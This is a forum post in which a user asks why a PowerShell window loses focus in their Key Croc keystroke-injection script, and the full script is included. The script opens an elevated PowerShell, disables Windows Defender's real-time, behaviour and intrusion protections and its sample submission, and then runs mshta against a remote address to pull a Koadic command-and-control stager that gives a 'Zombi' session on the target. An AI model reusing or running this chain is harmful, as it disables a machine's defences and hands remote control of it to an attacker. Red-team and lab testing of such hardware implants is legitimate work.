Focus on the window

fneagle

Hi,

I'm trying to get a simple script running with the Key Croc. I had many problems in the beginning with Wifi, language and special keys, but have made some progress.

First of all: It is very difficult to get a simple script running with the Croc.  You always have to switch between arming and attack mode. Sometimes it is working, sometimes not. I can even see no reason why it is so unstable. My feedback at the moment: It is not worse to use it. Keylogger okay, but for the rest I'll use different tools.

I don't want to give up and would like to finish my project with the Croc. Here is my script:

MATCH easy
QUACK DELAY 1000

# Disable Defender
ATTACKMODE HID
QUACK GUI-r
QUACK DELAY 1000
export DUCKY_LANG=de
QUACK DELAY 1000
QUACK STRING "powershell Start-Process powershell -Verb runAS"
QUACK ENTER
sleep 3
QUACK ALT j
QUACK STRING "Set-MpPreference -DisableRealtimeMonitoring \$true -SubmitSamplesConsent NeverSend -DisableIOAVProtection \$true -DisableIntrusionPreventionSystem \$true -DisableBlockAtFirstSeen \$true -DisableBehaviorMonitoring \$true -MAPSReporting 0"
QUACK ENTER
sleep 1
QUACK STRING "Set-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1"
QUACK ENTER

#Start Attack with Koadic and get a Zombi
QUACK STRING "mshta http://192.168.171.32:443/index"
QUACK ENTER

Here is my question:

The script is running fine. The Windows Defender is disabled and a can run "mshta http://" to get a "Zombi" on my Koadic Server. The problem is, that after running the last command, I have no focus on the PowerShell window. This means, that I'm not able to add STRING exit to close the window. 

If I use the mouse and click on the window, I can add string again. Any suggestions?

Archived